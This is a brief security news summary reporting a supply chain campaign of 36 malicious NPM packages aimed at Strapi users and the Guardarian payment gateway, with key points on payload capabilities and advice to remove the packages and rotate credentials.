A threat actor mounted a supply chain attack against the Strapi ecosystem by publishing 36 malicious NPM packages that deliver payloads enabling Redis code execution, Docker container escape, credential harvesting, reverse shells, and persistent implants. SafeDep reports the campaign specifically targets Guardarian and Strapi configurations and advises affected users to remove the packages and rotate all credentials. #Strapi #Guardarian
Keypoints
- Thirty-six malicious NPM packages across four accounts were used in a single supply chain campaign targeting Strapi users.
- Payloads enabled Redis RCE, injected crontab entries, deployed webshells and Node.js reverse shells, and exfiltrated modules.
- Other payloads performed Docker container escape, wrote shells to host directories, and stole Elasticsearch and wallet credentials.
- SafeDep links the campaign to targeting the Guardarian cryptocurrency payment gateway and specific wallet files.
- Users are advised to remove the packages and rotate all credentials, including database passwords, API keys, and JWT secrets.
Read More: https://www.securityweek.com/guardarian-users-targeted-with-malicious-strapi-npm-packages/